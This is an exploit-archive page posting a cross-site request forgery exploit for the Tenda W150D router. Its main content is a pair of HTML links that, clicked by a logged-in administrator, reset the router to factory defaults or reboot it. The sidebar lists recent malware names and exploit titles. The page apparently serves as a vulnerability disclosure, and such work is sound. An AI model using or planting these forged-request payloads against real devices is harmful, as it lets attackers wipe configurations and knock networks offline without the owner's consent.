Tenda W150D Cross Site Request Forgery

Posted on 13 January 2015

# Exploit Title: Tenda W150D Router - CSRF Vulnerability # Date: 2015-01-10 # Exploit Author: Hadji Samir s-dz@hotmail.fr # Vendor Homepage: http://tenda.com.cn/ # Software Link: http://tenda.cn/tendacn/Product/show.aspx?productid=389 # Version: 1.0.0 # Thanks: Hamama Alzir (fb) When the administrator login, click on the link below " restore default the Router" <a href="http://192.168.1.1/restoreinfo.cgi">restore default</a> When the administrator login, click on the link below " the device will reboot" <a href="http://192.168.1.1/rebootinfo.cgi">reboot</a>

TOP

Malware :

Drovorub
Backdoor:Linux/IoTReaper
Ransom:Linux/Erebus.A
Backdoor:Linux/Luabot.A
Linux.Lady

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20